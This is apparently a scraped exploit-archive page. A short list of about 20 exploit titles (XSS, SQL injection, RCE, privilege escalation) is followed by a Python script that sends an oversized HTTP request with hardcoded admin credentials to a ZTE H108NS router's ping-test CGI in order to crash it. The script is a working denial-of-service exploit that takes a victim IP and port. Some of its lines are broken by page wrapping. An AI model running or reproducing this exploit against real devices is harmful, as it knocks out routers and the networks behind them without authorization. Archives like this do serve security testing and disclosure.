
22 changes to exploits/shellcodes/ghdb LISTSERV 17 - Insecure Direct Object Reference (IDOR) LISTSERV 17 - Reflected Cross Site Scripting (XSS) Router ZTE-H108NS - Stack Buffer Overflow (DoS) Router ZTE-H108NS - Authentication Bypass Boa Web Server v0.94.14 - Authentication Bypass Covenant v0.5 - Remote Code Execution (RCE) Dreamer CMS v4.0.0 - SQL Injection Shoplazza 1.1 - Stored Cross-Site Scripting (XSS) Virtual Reception v1.0 - Web Server Directory Traversal 4images 1.9 - Remote Command Execution (RCE) ClicShopping v3.402 - Cross-Site Scripting (XSS) Concrete5 CME v9.1.3 - Xpath injection Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE) Ecommerse v1.0 - Cross-Site Scripting (XSS) Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS) WPForms 1.7.8 - Cross-Site Scripting (XSS) CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path Zillya Total Security 3.0.2367.0 - Local Privilege Escalation
49 lines
No EOL
1.5 KiB
Python
Executable file
49 lines
No EOL
1.5 KiB
Python
Executable file
# Exploit Title: ZTE-H108NS - Stack Buffer Overflow (DoS)
|
|
# Date: 19-11-2022
|
|
# Exploit Author: George Tsimpidas
|
|
# Vendor: https://www.zte.com.cn/global/
|
|
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
|
|
# Usage: python zte-exploit.py <victim-ip> <port>
|
|
# CVE: N/A
|
|
# Tested on: Debian 5.18.5
|
|
|
|
#!/usr/bin/python3
|
|
|
|
|
|
import sys
|
|
import socket
|
|
from time import sleep
|
|
|
|
host = sys.argv[1] # Recieve IP from user
|
|
port = int(sys.argv[2]) # Recieve Port from user
|
|
|
|
junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"
|
|
* 5
|
|
|
|
|
|
buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"
|
|
+ junk + b"&TestBtn=START HTTP/1.1\r\n"
|
|
buffer += b"Host: 192.168.1.1\r\n"
|
|
buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)
|
|
Gecko/20100101 Firefox/91.0\r\n"
|
|
buffer += b"Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
|
|
buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
|
|
buffer += b"Accept-Encoding: gzip, deflate\r\n"
|
|
buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"
|
|
buffer += b"Connection: Keep-Alive\r\n"
|
|
buffer += b"Cookie:
|
|
SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;
|
|
_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"
|
|
buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"
|
|
|
|
|
|
|
|
|
|
print("[*] Sending evil payload...")
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((host, port))
|
|
s.send(buffer)
|
|
sleep(1)
|
|
s.close()
|
|
print("[+] Crashing boom boom ~ check if target is down ;)") |